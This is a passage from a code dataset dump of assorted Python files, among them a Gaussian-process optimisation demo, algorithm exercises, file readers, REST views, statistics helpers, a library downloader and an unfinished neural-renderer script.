K(test,training).T*inv(K(training,training))*trainingOutput\n        K = self.getKernelMatrix(self.trainInput,self.trainInput)\n        L = np.linalg.cholesky(K + self.varMeas*np.eye(self.trainInput.shape[0]))\n\n        # Compute mean\n        Lk = np.linalg.solve(L,self.getKernelMatrix(self.trainInput,input))\n        mu = np.dot(Lk.T, np.linalg.solve(L,self.trainOutput))\n\n        # Compute variance\n        KStar = self.getKernelMatrix(input,input)\n        var = KStar - np.dot(Lk.T,Lk)\n\n        return mu, var\n\n# Parameter\nkernelPar = 1\nvarMeas = 0.001\nkappa = 100\nGP = GP(kernelPar,varMeas)\n\n# Ground Truth\n#f = lambda x,y: x**2 + 0.9*y**2\nf = lambda x,y: (np.sin(x) + np.sin(y))*np.exp(-0.1*np.abs(x+y))\nxGT0, xGT1 = np.meshgrid(np.linspace(-5,5,100),np.linspace(-5,5,100))\nfGT = f(xGT0,xGT1)\n#print(\"fGT:\",fGT)\n\nxTrain = np.random.uniform(-5,5,(1,2))\nxTrainHist = np.zeros((1000,2))\nfTrainHist = np.zeros((1000,1))\n\nfig = plt.figure()\nplt.ion()\nplt.show()\nfor i in range(100):\n    print(i)\n    # next measurement:\n    fTrain = f(xTrain[:,0],xTrain[:,1]) + varMeas*np.random.randn()\n    fTrain = fTrain.reshape(-1,1)\n    GP.update(xTrain,fTrain)\n\n    nSample = 100\n    xSample = np.random.uniform(-5,5,(nSample,2))\n    mu,var = GP.predict(xSample)\n    xTrainHist[i,:] = xTrain\n    fTrainHist[i] = fTrain\n\n    # acquisition function\n    H = mu.reshape(nSample,1) + kappa*np.sqrt(var.diagonal()).reshape(nSample,1)\n    index = np.argmax(H)\n    xTrain = xSample[index,:].reshape(1,2)\n\n    if i%10 == 0:\n        ax = fig.add_subplot(111,projection='3d')\n        ax.plot_wireframe(xGT0, xGT1, fGT)\n        ax.plot(xTrainHist[:,0],xTrainHist[:,1],fTrainHist[:,0],\"g.\")\n        ax.plot(xSample[:,0],xSample[:,1],mu[:,0],\"r.\")\n        plt.title(\"True field\")\n        print(\"difference:\",np.mean(mu-f(xSample[:,0],xSample[:,1])))\n        fig.canvas.draw()\n\nplt.show(block=True)\n\n\n","sub_path":"gaussianProcess.py","file_name":"gaussianProcess.py","file_ext":"py","file_size_in_byte":3005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"597322301","text":"# Задача:\n# По данным n отрезкам необходимо найти множество точек минимального размера,\n# для которого каждый из отрезков содержит хотя бы одну из точек.\n#\n# В первой строке дано число 1≤n≤100 отрезков.\n# Каждая из последующих n строк содержит по два числа 0≤l≤r≤109, задающих начало и конец отрезка.\n# Выведите оптимальное число m точек и сами m точек.\n# Если таких множеств точек несколько, выведите любое из них.\n# Sample Input 1:\n#\n# 3\n# 1 3\n# 2 5\n# 3 6\n# Sample Output 1:\n#\n# 1\n# 3\n# Sample Input 2:\n#\n# 4\n# 4 7\n# 1 3\n# 2 5\n# 5 6\n# Sample Output 2:\n#\n# 2\n# 3 6\n\n\notr = []\n# Вводим количество отрезков\nn = int(input())\n# Заполняем otr отдельнами отрезками [[3,4],[5,6]]\nfor i in range(n):\n    otr.append([int(i) for i in input().split()])\n\n\n# Сортировка списка от наименьшего правого конца до наибольшего правого\notr = sorted(otr, key=lambda item: item[1])\n\n# Сразу добавляем правый конец первого отрезка для сравнения следующего\nall_dots = [otr[0][1]]\n\nfor i in range(n-1):\n    # Если начало следующего отрезка больше чем текущее значение, то добавляем новое значение\n    # Следующее значение соответственно будет сравниваться с новым по последнему элементу[-1]\n    if all_dots[-1] < otr[i+1][0]:\n        all_dots.append(otr[i+1][1])\n\n# Выводим длину отрезка и все элементы\nl = len(all_dots)\nprint(l)\n\nfor i in range(l):\n    print(all_dots[i], end=' ')","sub_path":"Greedy_algorithms/greed_1.py","file_name":"greed_1.py","file_ext":"py","file_size_in_byte":2030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"512915622","text":"#!/usr/bin/env python3\n\nimport logging\nimport sys\nlogging.debug(str(sys.version_info))\nif sys.version_info[0] < 3 or sys.version_info[1] < 5:\n    raise Exception(\"Requires python 3.5+, try module load python/3.6-anaconda-4.4\")\n\n# could conceivably access files over ssh/scp this way too..\n\nimport re\nimport os\n_protocols = ['http', 'https', 'file']\n_pattern = '|'.join(( '(?P<{0}>{0}:)'.format(p) for p in _protocols ))\n_re_url = re.compile('(?:{})(?P.*)'.format(_pattern))\ndef factory(url):\n    m = _re_url.search(url)\n    if m is None:\n        cls = LocalTextFile\n        path = url\n    elif m.group('file'):\n        cls = LocalTextFile\n        path = m.group('path')\n    else:\n        cls = RemoteTextFile\n        path = url\n    return cls(path)\n\n# common interface for local and remote files:\n\nclass TextFile:\n    \"\"\" common interface for accessing local and remote files \"\"\"\n    _blksz = 4096 # somewhat-arbitrary chunksize as unit for reading\n\n    @property\n    def nblocks(self):\n        return (self.size+self._blksz-1) // self._blksz\n\n\nclass LocalTextFile(TextFile):\n\n    def __init__(self, path):\n        self.path = path\n        self._size = None\n        self._lastlines_cache = {} # block: partial-line\n\n    @property\n    def size(self):\n        if self._size is None:\n             self._size = os.path.getsize(self.path)\n        return self._size\n\n    #def readlines(self, firstblock=0, n=0):\n    def readlines(self, start=0, n=0):\n        \"\"\" generator yiedling n lines starting from the first definitely-\n            complete line after start. If start!=0, readlines assumes\n            it has landed partway into a line and discards until the next line \n            break. If there is less than a full line, yields no lines\n            If n<=0. 
read to the end of the file.\n        \"\"\"\n        #logging.info(\"reading {0:d} lines from {1:d}\".format(n,start))\n        with open(self.path, 'r') as f:\n            #f.seek(firstblock*self._blksz)\n            f.seek(start) \n            line = f.readline()\n            #logging.info(\"read a line: {0}\".format(line))\n            count=0\n            if start == 0:\n                count += 1\n                #logging.info(\"yielding: {0}\".format(line))\n                yield line\n            while count < n or n <= 0:\n                line = f.readline()\n                if line == '':\n                    break\n                count += 1\n                #logging.info(\"yielding: {0}\".format(line))\n                yield line\n\n\nimport urllib.request  # used by RemoteTextFile; was missing from the original imports\n\nclass RemoteTextFile(TextFile):\n\n    def __init__(self, url):\n        self.url = url\n        self._size = None\n        # TODO: implement this:\n        self._lastlines_cache = {} # block: partial-line\n\n    @property\n    def size(self):\n        if self._size is None:\n            with urllib.request.urlopen(self.url) as f:\n                self._size = int(f.info()[\"Content-Length\"])\n        return self._size\n\n    def readlines(self, start=0, n=0):\n        if start==0 and n<=0:\n            # read whole file; urlopen yields bytes, so decode (utf-8 assumed)\n            with urllib.request.urlopen(self.url) as f:\n                for line in f.readlines():\n                    yield line.decode('utf-8')\n        else:\n            line = ''\n            count = 0  # was referenced before assignment\n            while count < n or n <= 0:\n                # need to keep fetching blocks till we have enough lines\n                b = 'bytes={0:d}-'.format(start)\n                if n>0: # not reading till end of file\n                    b+='{0:d}'.format(min(start+self._blksz,self.size))\n                req = urllib.request.Request(self.url, headers={'Range':b})\n                with urllib.request.urlopen(req) as f:\n                    line += f.readline().decode('utf-8') # in case previous range left an unfinished line\n                    while count < n or n <= 0:\n                        if line == '':\n                            # nothing left to read\n                            return\n                        if line[-1] != '\\n':\n                            # end of block, break and read next block\n                            start += self._blksz\n                            break\n                        count += 1  # was n += 1, which corrupted the requested line count\n                        yield line\n                        line = f.readline().decode('utf-8')\n\n\n#import re\n#protocols = ['http', 'https', 'file']\n#pattern = '|'.join(( '(?P<{0}>{0}:)'.format(p) for p in protocols ))\n#re_url = re.compile('(?:{})(?P<path>.*)'.format(pattern))\n#def TimeStampedLogFile(url, info):\n#    m = re_url.search(url)\n#    if m is None:\n#        cls = LocalTimeStampedLogFile\n#        path = url\n#    elif m.group('file'):\n#        cls = LocalTimeStampedLogFile\n#        path = m.group('path')\n#    else:\n#        cls = RemoteTimeStampedLogFile\n#        path = url\n#    return cls(path, info)\n#\n#logFormat = 'timeStampedLogFile'\n#constructor = TimeStampedLogFile\n#\n#import os\n#import dateutil.parser\n#class LocalTimeStampedLogFile(LogFormatType):\n#    # logfiles might be very large, and we often need to find particular lines.\n#    # rather than reading the whole file linearly and parsing for newlines, we'll\n#    # read chunks from an arbitrary location and pull complete lines from them.\n#    # _blocksz is an initial chunk size
to use for this\n#    _blocksz = 1000\n#\n#    def __init__(self, path, info):\n#        self.path = path\n#        # regular attributes:\n#        # ts_words is the word or word ranges making up the timestamp, 0 is first-word-in-line:\n#        ts_words = info.get('ts_words',None)\n#        if ts_words:\n#            first, sep, last = ts_words.partition('-')\n#            ifirst = int(first)\n#            if last:\n#                ilast = int(last)+1\n#            else:\n#                ilast = ifirst + 1\n#            self.ts_words = (ifirst,ilast)\n#        else:\n#            self.ts_words = None\n#        # part_word is the word identifying the part about which each entry is:\n#        part_word = info.get('part_word',None)\n#        if part_word:\n#            self.part_word = int(part_word)\n#        else:\n#            self.part_word = None\n#        #for f in ('ts_words', 'part_word'):\n#        #    setattr(self, f, int(info.get(f, None))) # TODO handle int conversion better\n#        # attributes we might have to find from file:\n#        for f in ('size', 't_start', 't_end'):\n#            setattr(self, '_'+f, info.get(f, None))\n#\n#    @property\n#    def size(self):\n#        if self._size is None:\n#             self._size = os.path.getsize(self.path)\n#        return self._size\n#\n#    import io\n#    def timespan(self):\n#        \"\"\" return the timestamps of the first and last entries in the file \"\"\"\n#        if self._t_start is None or self._t_end is None:\n#            with open(self.path, 'r') as f:\n#                # find the first and last lines, check the timestamps\n#                firstline = f.readline()\n#            sz = self.size\n#            #with open(self.path, 'rb') as f:\n#            with open(self.path, 'r') as f: # must be text or string methods get confused\n#                bs = min(self._blocksz, sz)\n#                lines = []\n#                while bs <= sz:\n#                    #f.seek(-bs, 2)\n#                    f.seek(sz-bs)   # can only seek from start in text files\n#                    lines = f.readlines() # read to end of file\n#                    if len(lines) > 1:\n#                        break\n#                    bs *= 2\n#                else:\n#                    raise Exception(\"can't find last entry in {0:s}\".format(self.path))\n#                lastline = lines[-1]\n#            print (lastline)\n#            print(lastline.split())\n#            print(lastline.split()[self.ts_words[0]:self.ts_words[1]])\n#            print(self.ts_words)\n#            print(' '.join(lastline.split()[self.ts_words[0]:self.ts_words[1]]))\n#            self._t_start = dateutil.parser.parse(' '.join(firstline.split()[self.ts_words[0]:self.ts_words[1]]))\n#            self._t_end = dateutil.parser.parse(' '.join(lastline.split()[self.ts_words[0]:self.ts_words[1]]))\n#        return (self._t_start, self._t_end)\n#\n#    def entries(self, since=None, until=None, parts=None):\n#        \"\"\" return the log entries of data between 'since' (or the start of the \n#            file) and 'until' (or the end of the file), inclusive, optionally\n#            filtering for certain parts\n#        \"\"\"\n#        pass\n#\n#\n#import urllib.request\n#class RemoteTimeStampedLogFile(LogFormatType):\n#    _blocksz = 1000\n#\n#    def __init__(self, url, info):\n#        self.url = url\n#        # regular attributes:\n#        for f in ('ts_word', 'part_word'):\n#            setattr(self, f, info.get(f, None))\n#        # attributes we might 
have to find from file:\n#        for f in ('size', 't_start', 't_end'):\n#            setattr(self, '_'+f, info.get(f, None))\n#\n#    @property\n#    def size(self):\n#        if self._size is None:\n#            with urllib.request.urlopen(self.url) as f:\n#                self.size = f.info()[\"Content-Length\"]\n#        return self._size\n#\n#    def timespan(self):\n#        if self._t_start is None or self._t_end is None:\n#            with urllib.request.urlopen(self.url) as f:\n#                # find the first and last lines, check the timestamps\n#                firstline = f.readline()\n#            # read the last _blocksz bytes\n#            bs = min(self._blocksz, sz)\n#            lines = []\n#            # make sure we get at least a full line:\n#            while bs <= sz:\n#                b = 'bytes={0:d}-'.format(int(self.size)-bs)\n#                req = urllib.request.Request(self.url, headers={'Range':b})\n#                with urllib.request.urlopen(req) as f:\n#                    lines = f.readlines() # read to end of file\n#                    if len(lines) > 1:\n#                        break\n#                    bs += self._blocksz \n#            else:\n#                raise Exception(\"can't find last entry in {0:s}\".format(self.url))\n#            lastline = lines[-1]\n#            self._t_start = dateutil.parser.parse(firstline.split()[self.ts_word])\n#            self._t_end = dateutil.parser.parse(lastline.split()[self.ts_word])\n#        return (self._t_start, self._t_end)\n\n\n    \n","sub_path":"src/handlers/TextFile.py","file_name":"TextFile.py","file_ext":"py","file_size_in_byte":10185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
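A minimal usage sketch for the local path through the factory above (the file name is hypothetical; an http or https URL would dispatch to RemoteTextFile instead):

    f = factory('file:/tmp/example.log')    # the URL regex dispatches this to LocalTextFile
    print(f.size, f.nblocks)
    for line in f.readlines(start=0, n=3):  # first three complete lines
        print(line, end='')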
+{"seq_id":"532850381","text":"import os\nfrom typing import Optional\n\nimport yaml\nimport PySimpleGUI as sg\n\n\ndef mkdir(dir_path):\n    if not os.path.exists(dir_path):\n        os.mkdir(dir_path)\n\n\nclass YamlConfig:\n    def __init__(self, file_name=\"./settings/config.yaml\"):\n        self.file_name = file_name\n    \n    def load(self) -> dict:\n        \"\"\"\n        yamlファイルを読み辞書形式で結果を返す\n        :return: yamlファイルのデータ構造(辞書)\n        \"\"\"\n        with open(self.file_name, \"r\") as yf:\n            return yaml.load(yf, Loader=yaml.FullLoader)\n    \n    def write(self, data: dict) -> None:\n        \"\"\"\n        yamlを書き出す\n        :param data: yamlで出力するデータをまとめた辞書\n        \"\"\"\n        with open(self.file_name, \"w\") as yf:\n            yaml.dump(data, yf, default_flow_style=False)\n\n\ndef get_token(path):\n    yc = YamlConfig(path)\n    token: str = \"\"\n    if os.path.exists(path):\n        conf = yc.load()\n        token = conf[\"token\"]\n        \n    register_token: Optional[str] = sg.PopupGetText(\"Input the discord bot token\", \"Discord token\", token)\n    if register_token is None:\n        exit()\n    yc.write({\"token\": register_token})\n    return register_token\n","sub_path":"pkg/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"336476060","text":"import re\nfirst = True\nwhile True:\n    linhas = int(input())\n    texto = []\n    maior = 0\n    if linhas == 0:\n        break\n    else:\n        if not first:\n            print()\n        for l in range(linhas):\n            linha = re.sub(r'\\s+',' ', input().strip())\n            texto.append(linha)\n            if len(linha) > maior:\n                maior = len(linha)\n        for l in texto:\n            print('{0:>{1}}'.format(l,maior))\n        first = False","sub_path":"String/1278.py","file_name":"1278.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"545720141","text":"import random\npincode = [\"1221\", \"9997\", \"8829\", \"6765\", \"9114\", \"5673\", \"0103\", \"4370\", \"8301\", \"1022\"]\nnumber = (random.choice (pincode))\nprint(number)\n\nquesses = 0\nwhile quesses < 10:\n  userinput = input(\"Guess the random 4 digit number: \")\n\n  quesses += 1    \n  print (\"This is your guess: %s\" %(userinput))\n  print (\"You have used \" + str(quesses) + \" out of 10 guesses\")\n  if userinput == number:\n    quesses2 = str(quesses)\n    print (\"You guessed it in:\", quesses2 + \" guesses\")  \n\n  number = str(number)\n  userinput = str(userinput)\n  \n  if userinput.isdigit() == False:\n    print (\"Error: You can only use numbers\")\n    quesses = quesses - 1\n    continue\n  \n  if len(userinput) != len(number):\n    print(\"Your input is too long or too short.\")\n    quesses = quesses - 1\n    continue\n\n\n\n  check = [\"F\"] * 4\n  if userinput == number and quesses >= 1:\n    print(\"The game was beaten in \" + str(quesses) +\" quesses. Congratulations!\")\n    break\n  else:\n    for idx, digit in enumerate(userinput):     \n      #als het nummer op de goede plek staat, print G\n      if number[idx] == digit:       \n        check[idx] = \"G\"\n      \n      #als het nummer vookomt, print C\n      elif digit in number:\n        check[idx] = \"C\"\n      \n      #anders, print F\n      else:        \n        check[idx] = \"F\"\n      \n\n  e1 = \"1980\"\n  e2 = \"1955\"\n\n  if userinput != number and userinput == e1:\n\n     if userinput == e1:\n        print (\"Yeah! You found an easteregg: The birthyear of LGG!\")\n     quesses = quesses - 1\n    \n  elif userinput != number and userinput == e2:\n\n     if userinput == e2:\n        print (\"Yeah! You found an easteregg: The birthyear of BNT!\")\n     quesses = quesses - 1\n\n  else:\n     print(*check, sep=\" \")\n     print (\"Wrong code\")\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"44685908","text":"\"\"\"Test Clang utils.\"\"\"\nfrom collections import namedtuple\nfrom os import path\nfrom unittest import TestCase\n\nfrom EasyClangComplete.plugin.clang.utils import ClangUtils\n\ntest_file = namedtuple('test_file', 'name')\ntest_cursor = namedtuple('test_cursor', 'file line')\ntest_extent = namedtuple('test_extent', 'start end')\n\n\nclass TestClangUtils(TestCase):\n    \"\"\"Tests MacroParser.\"\"\"\n\n    def test_htmlize_text_ltgt(self):\n        \"\"\"Test a <> symbols convertion.\"\"\"\n        res = ClangUtils.htmlize_text('<>')\n        self.assertEqual(res, '<>')\n\n    def test_htmlize_text_newline(self):\n        \"\"\"Test a \\n convertion.\"\"\"\n        res = ClangUtils.htmlize_text('text\\ntext')\n        self.assertEqual(res, 'text
text')\n\n def test_htmlize_text_tab(self):\n \"\"\"Test a \\t convertion.\"\"\"\n res = ClangUtils.htmlize_text('text\\ttext')\n self.assertEqual(res, 'text' + 4 * ' ' + 'text')\n\n def test_htmlize_text_quot(self):\n \"\"\"Test a \" symbol convertion.\"\"\"\n res = ClangUtils.htmlize_text('text\"text')\n self.assertEqual(res, 'text' + ' ' + 'text')\n\n def test_htmlize_text_spaces(self):\n \"\"\"Test a single-line string with spaces.\"\"\"\n res = ClangUtils.htmlize_text(' 123')\n self.assertEqual(res, 3 * ' ' + '123')\n\n def test_get_text_by_extent_multifile(self):\n \"\"\"Test getting text from multifile extent.\"\"\"\n file1 = test_file('file1.c')\n file2 = test_file('file2.c')\n cursor1 = test_cursor(file1, 1)\n cursor2 = test_cursor(file2, 6)\n ext = test_extent(cursor1, cursor2)\n self.assertEqual(ClangUtils.get_text_by_extent(ext), None)\n\n def test_get_text_by_extent_oneline(self):\n \"\"\"Test getting text from oneline extent.\"\"\"\n file_name = path.join(path.dirname(__file__),\n 'test_files',\n 'test.cpp')\n file1 = test_file(file_name)\n cursor1 = test_cursor(file1, 8)\n cursor2 = test_cursor(file1, 8)\n ext = test_extent(cursor1, cursor2)\n self.assertEqual(ClangUtils.get_text_by_extent(ext), ' A a;\\n')\n\n def test_get_text_by_extent_multiline(self):\n \"\"\"Test getting text from multiline extent.\"\"\"\n file_name = path.join(path.dirname(__file__),\n 'test_files',\n 'test.cpp')\n file1 = test_file(file_name)\n cursor1 = test_cursor(file1, 8)\n cursor2 = test_cursor(file1, 9)\n ext = test_extent(cursor1, cursor2)\n self.assertEqual(ClangUtils.get_text_by_extent(ext), ' A a;\\n a.\\n')\n","sub_path":"tests/test_clang_utils.py","file_name":"test_clang_utils.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"396414280","text":"from rest_framework import (\n generics,\n permissions\n)\nfrom rest_framework_gis.pagination import GeoJsonPagination\n\nfrom api.serializers.tracks import (\n TrackSerializer,\n TrackGeoSerializer\n)\n\nfrom api.models import Track\n\nfrom api.filters import TrackFilter\n\n\nclass ListTrack(generics.ListAPIView):\n \"\"\"\n get:\n Returns a list of all tracks.\n \"\"\"\n serializer_class = TrackSerializer\n queryset = Track.objects.all()\n permission_classes = (permissions.AllowAny,)\n filter_class = TrackFilter\n\n\nclass RetrieveTrack(generics.RetrieveAPIView):\n \"\"\"\n get:\n Returns the given track.\n \"\"\"\n serializer_class = TrackSerializer\n queryset = Track.objects.all()\n permission_classes = (permissions.AllowAny,)\n\n\nclass ListGeoTrack(generics.ListAPIView):\n \"\"\"\n get:\n Returns a list of all tracks in geojson format.\n \"\"\"\n serializer_class = TrackGeoSerializer\n queryset = Track.objects.all()\n permission_classes = (permissions.AllowAny,)\n pagination_class = GeoJsonPagination\n filter_class = TrackFilter\n","sub_path":"app/api/views/tracks.py","file_name":"tracks.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"643287675","text":"# -*- coding: utf-8 -*-\nfrom textwrap import dedent\n\nimport numpy as np\nfrom scipy.stats import norm\n\nclass Sampler:\n def __init__(\n self,\n sample_size=None,\n population_size=None,\n margin_of_error=0.05,\n confidence_level=0.95,\n verbose=False\n ):\n self.sample_size=sample_size\n self.population_size=population_size\n self.margin_of_error=margin_of_error\n 
self.confidence_level=confidence_level\n self.verbose=verbose\n\n\nclass ProportionSampler(Sampler):\n def __init__(self, p_hat, **kwargs):\n super().__init__(**kwargs)\n self.p_hat=p_hat\n\n def __str__(self):\n msg = f\"\"\"\n *** Proportion Sampler Parameters ***\n =====================================\n observed p: {self.p_hat}\n sample size: {self.sample_size}\n population size: {self.population_size}\n margin of error: {self.margin_of_error}\n confidence level: {self.confidence_level}\n =====================================\n \"\"\"\n return dedent(msg)\n\n def _check_and_get(self, attr_name):\n attr = getattr(self, attr_name)\n if attr is None:\n raise ValueError(f'{attr_name} must be provided.')\n return attr\n\n def get_minimum_sample_size(self):\n p = self.p_hat\n m = self.margin_of_error\n c = self.confidence_level\n N = self.population_size\n p = self._check_and_get('p_hat')\n z = norm.ppf(1-(1-c)/2)\n sigma2 = (z**2) * p * (1 - p)\n n = sigma2 / (m**2)\n if N is None or n / N < 0.05:\n return np.round(n)\n else:\n if self.verbose:\n print('Applying finite population correction.')\n return np.round((N * sigma2) / ((m**2) * N + sigma2))\n\n def get_standard_error(self):\n p = self._check_and_get('p_hat')\n n = self._check_and_get('sample_size')\n fpc = 1\n N = self.population_size\n if N is not None and n / N > 0.05: \n fpc = np.sqrt((N-n)/(N-1))\n return np.sqrt(p*(1-p)/n) * fpc\n\n def get_margin_of_error(self):\n c = self._check_and_get('confidence_level')\n z = norm.ppf(1-(1-c)/2)\n return self.get_standard_error() * z\n\n def get_confidence_interval(self):\n p = self._check_and_get('p_hat')\n m = self.get_margin_of_error()\n return (p-m, p+m)\n","sub_path":"clinical/clinical.py","file_name":"clinical.py","file_ext":"py","file_size_in_byte":2421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"375894727","text":"#!/bin/bash\n\nimport os\nfrom path import Path\nimport numpy as np\nimport glob\n\nPATH_DATA = Path('/scratch/bigdata/ABCD/abcd-fmriprep-rs/abcd-fmriprep-rs-untar')\nPATH_OUT = Path('/scratch/bigdata/ABCD/abcd-fmriprep-rs/abcd-fmriprep-rs-time')\n\n# \nSH_file = '/scratch/bigdata/ABCD/abcd-fmriprep-rs/time.sh'\n\ncmds = []\ndirs_input = sorted(PATH_DATA.glob('fmriprep-deri-*'))\n\nfor fprep in dirs_input:\n # extract sub name\n sub_num=os.path.basename(fprep) #-> split해서 마지막 이름만 받기\n sub_name=sub_num.split('-')[2]\n\n sub_run_folder=fprep+'/fmriprep/sub-'+sub_name+'/ses-baselineYear1Arm1/func'\n sub_run=[f for f in os.listdir(sub_run_folder) if 'res-2_desc-preproc_bold.nii.gz' in f]\n\n # return the base name from the path\n dir_out = str(PATH_OUT / os.path.basename(fprep))\n for s_run in sub_run:\n # cmds from : .sh file + input file(npz) + (output path+sub_name)\n cmds.append(' '.join([SH_file, str(sub_run_folder+'/'+s_run), dir_out, '\\n']))\n\nwith open('./jobs.txt', 'w') as f:\n f.writelines(cmds)\n\n","sub_path":"after_job_scheduler/time_create_jobs.py","file_name":"time_create_jobs.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"578908757","text":"\nimport os\nimport shutil\nimport system_helper\nimport zipfile\nimport requests\n\n\n'''\nDownloads a header only library as zip file and extracts the relevant include folder in the extern/ folder.\n\\param 1 - target folder name: /extern/, e.g. \"cgal\"\n\\param 2 - include folder in downloaded library, e.g. 
\"CGAL-5.0.2/include\"\n\\param 3 - zip file name, e.g. \"CGAL-5.0.2-library.zip\"\n\\param 4 - link to .zip file, e.g. \"https://github.com/CGAL/cgal/releases/download/releases%2FCGAL-5.0.2/CGAL-5.0.2-library.zip\"\n'''\n\nextern_folder=\"extern\"\n\ndebug_output = False\n\nclass HeaderOnlyDescription:\n \n '''\n \\param target_folder, e.g. \"cgal\"\n \\param include_folder, e.g. \"CGAL-5.0.2/include\"\n \\param zip_file, e.g. \"CGAL-5.0.2-library.zip\"\n \\param download_link, e.g. \"https://github.com/CGAL/cgal/releases/download/releases%2FCGAL-5.0.2/CGAL-5.0.2-library.zip\"\n '''\n def __init__(self, target_folder, include_folder, zip_file, download_link):\n self.target_folder = target_folder\n self.include_folder = include_folder\n self.zip_file = zip_file\n self.download_link = download_link\n\ndef download_header_only(target_folder, include_folder, zip_file, download_link, tmp_folder, extern_folder = \"extern\", verbose = True): \n '''\n \\param target_folder, e.g. \"cgal\"\n \\param include_folder, e.g. \"CGAL-5.0.2/include\"\n \\param zip_file, e.g. \"CGAL-5.0.2-library.zip\"\n \\param download_link, e.g. \"https://github.com/CGAL/cgal/releases/download/releases%2FCGAL-5.0.2/CGAL-5.0.2-library.zip\"\n \\param tmp_folder - a termporary folder that can be used to store intermediate products of the downloading process. Should be either non existent or empty.\n \\param extern_folder - folder in which the libraries are stored in, e.g. \"extern\"\n \\param verbose - additional information are printed in output\n '''\n\n path = extern_folder + \"/\" + target_folder\n if os.path.exists(path):\n if debug_output:\n print(target_folder + \" already exists. Skipping...\")\n else:\n if not os.path.exists(tmp_folder):\n os.mkdir(tmp_folder)\n with system_helper.cd(tmp_folder):\n if verbose:\n print (target_folder + \" not found, downloading...\")\n\n # download the file and put it in the current folder \n try:\n r = requests.get(download_link)\n with open(zip_file, 'wb') as outfile:\n outfile.write(r.content)\n except Exception as e:\n print (e)\n print (\"Download unavailable at \" + download_link + \". Aborting...\")\n return\n \n if debug_output:\n print (\"Downloading complete.\")\n \n with zipfile.ZipFile(zip_file, 'r') as zip_ref:\n zip_ref.extractall()\n os.remove(zip_file)\n \n os.makedirs(\"../extern/\" + target_folder, exist_ok=True)\n system_helper.copytree(include_folder, \"../extern/\" + target_folder)\n if debug_output:\n print(\"Successfully downloaded and installed \" + target_folder)\n\ndef download_headers_only(header_only_descriptions, extern_folder = \"extern\", verbose = True):\n '''\n Downloads a header only library as zip file and extracts the relevant include folder in the extern/ folder.\n \\param header_only_descriptions - list of HeaderOnlyDescriptions that \n are used to download the header only libraries.\n \\param extern_folder - folder in which the libraries are stored in, e.g. \"extern\"\n \\param verbose - additional information are printed in output\n '''\n\n # create a tmp folder that doesn't exist yet. 
Simply appends _\n tmp_folder = \"_tmp\"\n while os.path.exists(tmp_folder):\n tmp_folder = \"_\" + tmp_folder\n \n if not os.path.exists(extern_folder):\n os.mkdir(extern_folder)\n \n for d in header_only_descriptions:\n download_header_only(d.target_folder, d.include_folder, d.zip_file, d.download_link, tmp_folder, extern_folder, verbose)\n\n if os.path.isdir(tmp_folder):\n shutil.rmtree(tmp_folder)\n ","sub_path":"scripts/python/download_header_only.py","file_name":"download_header_only.py","file_ext":"py","file_size_in_byte":4179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"394992185","text":"\"\"\"\nRenderer estimator for the converge of 1 image\ntool has rotation motion\nResnet outputs 3 parameters\n\"\"\"\nimport os\nimport argparse\nimport glob\nfrom torch.utils.data import Dataset\nfrom scipy.spatial.transform.rotation import Rotation as Rot\nimport torch\nimport math as m\nimport torch.nn as nn\nimport numpy as np\nfrom skimage.io import imread, imsave\nimport tqdm\nimport imageio\nimport time\nfrom torch.autograd import Variable\nimport torch\nimport torchvision.models as models\nfrom torchvision.models.resnet import ResNet, Bottleneck\nimport torchvision.models as models\nimport torchgeometry as tgm #from https://torchgeometry.readthedocs.io/en/v0.1.2/_modules/torchgeometry/core/homography_warper.html\nfrom torch.utils.data import DataLoader\nfrom torchvision.transforms import ToTensor, Compose, Normalize, Lambda\nimport matplotlib.pyplot as plt\nimport math as m\nimport torch.utils.model_zoo as model_zoo\nimport neural_renderer as nr\nfrom scipy.misc import imsave\nimport matplotlib2tikz\n\n\ncurrent_dir = os.path.dirname(os.path.realpath(__file__))\ndata_dir = os.path.join(current_dir, '3D_objects')\nresult_dir = os.path.join(current_dir, 'results/2_rotation_render')\n\n\n__all__ = ['ResNet', 'resnet18', 'resnet34', 'resnet50', 'resnet101',\n 'resnet152']\n\nmodel_urls = {\n 'resnet18': 'https://download.pytorch.org/models/resnet18-5c106cde.pth',\n 'resnet34': 'https://download.pytorch.org/models/resnet34-333f7ec4.pth',\n 'resnet50': 'https://download.pytorch.org/models/resnet50-19c8e357.pth',\n 'resnet101': 'https://download.pytorch.org/models/resnet101-5d3b4d8f.pth',\n 'resnet152': 'https://download.pytorch.org/models/resnet152-b121ed2d.pth',\n}\n\nclass CubeDataset(Dataset):\n # code to shape data for the dataloader\n def __init__(self, images, silhouettes, parameters, transform=None):\n self.images = images.astype(np.uint8) # our image\n self.silhouettes = silhouettes.astype(np.uint8) # our related parameter\n self.parameters = parameters.astype(np.float32)\n self.transform = transform\n\n def __getitem__(self, index):\n # Anything could go here, e.g. 
